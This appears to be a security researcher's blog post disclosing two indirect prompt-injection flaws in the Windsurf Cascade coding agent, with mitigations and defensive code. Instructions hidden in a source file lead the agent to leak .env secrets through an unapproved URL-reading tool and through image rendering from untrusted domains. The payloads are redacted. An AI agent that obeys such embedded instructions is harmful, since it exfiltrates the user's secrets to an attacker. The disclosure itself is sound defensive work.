Hijacking Windsurf: How Prompt Injection Leaks Developer Secrets

Posted on Aug 21, 2025

#llm #agents #month of ai bugs

This is the first post in a series exploring security vulnerabilities in Windsurf. If you are unfamiliar with Windsurf, it is a fork of VS Code, and its coding agent is called Windsurf Cascade.

The attack vectors we will explore today allow an adversary to exfiltrate data from the developer’s machine through an indirect prompt injection.

These vulnerabilities are a great example of Simon Willison’s lethal trifecta pattern.

Overall, the security vulnerability reporting experience with Windsurf has not been great. All findings were responsibly disclosed on May 30, 2025, and receipt was acknowledged a few days later. However, all further inquiries regarding bug status or fixes remain unanswered. The recent business disruptions and the departure of the CEO and core team members certainly put Windsurf in the news.

Since Windsurf has been unresponsive and these high-severity vulnerabilities allow the exfiltration of sensitive information from developers, this post will not disclose all technical details and prompt injection payloads. Hopefully, Windsurf will eventually address these deficiencies.

Update: Windsurf reached out to say that they will be working on fixes, although there is no ETA yet.

Let’s explore this in detail.

Windsurf System Prompt

When looking at a new system, I always take a peek at the system prompt first. I’m looking for tools that could be invoked during a prompt injection attack. Sometimes there are also other interesting tidbits present.

Here is a snippet of the system prompt:

You can find the Windsurf Cascade system prompt here.

One thing that stood out to me right away was the read_url_content tool.

Attack Vector 1: Tools as Data Exfiltration Vectors

As the name read_url_content suggests, this tool allows Windsurf to connect to a website and read data from it. However, a read capability can also serve as a data exfiltration channel, because data can be embedded in the outbound HTTP request. This tool does not require user approval, so an adversary can invoke it during an indirect prompt injection attack without any user confirmation.
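To make the point about outbound requests concrete, here is a minimal sketch of why a "read-only" fetch doubles as a write channel. It performs no network access and is not the redacted payload. The endpoint `attacker.example`, the query parameter `d`, and both function names are assumptions made up for illustration.

```python
from urllib.parse import urlencode, urlsplit, parse_qs

# Hypothetical attacker-controlled endpoint (an assumption, not from the post).
ATTACKER_ENDPOINT = "https://attacker.example/collect"


def build_fetch_url(secret_text: str) -> str:
    """Return the URL a 'read' tool would be asked to retrieve."""
    # The data travels in the query string of an ordinary GET request.
    return f"{ATTACKER_ENDPOINT}?{urlencode({'d': secret_text})}"


def what_the_server_sees(url: str) -> str:
    """Recover the data from the request URL, as a server access log would."""
    return parse_qs(urlsplit(url).query)["d"][0]


url = build_fetch_url("API_KEY=example-not-a-real-key")
print(url)
print(what_the_server_sees(url))
```

The response body is irrelevant here: by the time the server answers, the data has already left the machine as part of the request.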

Exploit Demonstration

The prompt injection exploit for this demo is stored in a source code file. This represents one plausible attack vector, but certainly not the only one!

Now, when the developer analyzes the file with Windsurf Cascade, the embedded instructions hijack the AI agent and exfiltrate the contents of the .env file using the read_url_content tool.

The above screenshot shows how, by simply analyzing a file with Windsurf, the text within it can hijack Windsurf Cascade to exfiltrate sensitive information from the developer’s workstation.

Video Demonstration Proof-of-Concept

This video shows how such an exploit chain looks end-to-end:

Prompt Injection Payload

This is the text at the beginning of the source code file:

<redacted for now, as this is not fixed>

With this simple proof-of-concept payload, the AI agent is hijacked to exfiltrate sensitive environment variables and other information as it analyzes the file, all without requiring user approval.

Attack Vector 2: Image Rendering

The second attack vector is quite similar to a vulnerability I found in GitHub Copilot last year, which Microsoft has since fixed. You can read the details here.

Image rendering from untrusted domains is actually one of the most common AI application security vulnerabilities to be aware of. We have seen dozens of examples of this vulnerability over the last two+ years.

Exploit Demonstration

As we have shown with many similar attacks over the last two+ years, this does not require a human in the loop and leads to data leakage when an application renders images from untrusted domains.

To keep this post short, the following screenshot shows the end-to-end exploit chain:

This shows how Windsurf is hijacked and exfiltrates sensitive information from the developer’s workstation to a third-party server.

Video Demonstration Proof-of-Concept

Prompt Injection Payload

This is the text at the beginning of the source code file:

<redacted for now, as this is not fixed>

That’s all that was needed to hijack Windsurf Cascade.

Responsible Disclosure

These vulnerabilities were disclosed to Windsurf on May 30, 2025, and receipt was acknowledged by Windsurf a few days later. However, all further inquiries about triage, bug status, or fixes remain unanswered.

Hence, disclosing this publicly after three months seems the best approach to raise awareness and educate customers and users about these high-severity vulnerabilities.

Update: Windsurf reached out to say that they will be working on fixes, although there is no ETA yet.

Mitigations

Require a human-in-the-loop before invoking the read_url_content tool with untrusted servers
Consider an allow-list of trusted domains that can be read from securely without user approval
Do not render images/hyperlinks to untrusted domains. VS Code has an allow list of trusted domains, so it might be best to integrate with that feature
Also, do not automatically navigate to clickable hyperlinks (e.g. phishing attacks)
If you are a customer of Windsurf, I suggest reaching out to your account manager to inquire about these high-severity vulnerabilities to raise awareness and get them fixed
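The first two mitigations could be combined roughly as follows. This is only a sketch under stated assumptions, not how Windsurf or VS Code implements trust: the `TRUSTED_HOSTS` set, `is_trusted`, `gate_fetch`, and the `ask_user` callback are all hypothetical names.

```python
from urllib.parse import urlsplit

# Hypothetical allow-list; a real product would load this from user settings.
TRUSTED_HOSTS = {"docs.python.org", "github.com"}


def is_trusted(url: str) -> bool:
    """True only for https URLs whose host exactly matches the allow-list."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False  # malformed URL: treat as untrusted
    host = (parts.hostname or "").lower()
    return parts.scheme == "https" and host in TRUSTED_HOSTS


def gate_fetch(url: str, ask_user) -> bool:
    """Allow trusted URLs silently; otherwise defer to a human decision."""
    if is_trusted(url):
        return True
    # ask_user is a hypothetical callback that shows the full URL to the
    # developer and returns True only on explicit approval.
    return bool(ask_user(url))
```

Comparing the parsed hostname, rather than searching the URL string for a trusted name, avoids lookalikes such as github.com.attacker.example. Exact matching is a deliberately strict choice for this sketch. Whether to also trust subdomains is a separate policy decision.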

Conclusion

Windsurf Cascade is vulnerable to prompt injection, and since there is no deterministic fix for prompt injection itself, security has to be enforced downstream of LLM output.

As demonstrated, a third-party attacker can embed malicious instructions in source code or websites, or deliver them through RAG poisoning. When Cascade analyzes such content, it becomes a “confused deputy”, and weaknesses in tool invocation and image rendering can then lead to data exfiltration.
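As one illustration of enforcing a check downstream of LLM output, the sketch below neutralizes Markdown images that point at hosts outside an allow-list before the text is rendered. It is a simplified regex-based filter, not a full Markdown parser: it does not cover HTML img tags or reference-style images. The `TRUSTED_IMAGE_HOSTS` set and the function name are assumptions for illustration.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allow-list of hosts that images may be loaded from.
TRUSTED_IMAGE_HOSTS = {"example.com"}

# Matches inline Markdown images: ![alt](url) or ![alt](url "title").
IMAGE_PATTERN = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")


def neutralize_untrusted_images(markdown: str) -> str:
    """Replace images from non-allow-listed hosts with inert placeholder text."""

    def replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        try:
            host = (urlsplit(url).hostname or "").lower()
        except ValueError:
            host = ""  # malformed URL: treat as untrusted
        if host in TRUSTED_IMAGE_HOSTS:
            return match.group(0)  # keep trusted images unchanged
        return f"[image blocked: {alt}]"

    return IMAGE_PATTERN.sub(replace, markdown)


text = "Logo ![logo](https://example.com/a.png) and ![x](https://attacker.example/p.png?d=secret)"
print(neutralize_untrusted_images(text))
```

Because the filter runs on the model’s output rather than relying on the model to refuse, it still applies when the agent has been hijacked. Images with relative URLs have no host and are also blocked in this sketch.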

Embrace The Red
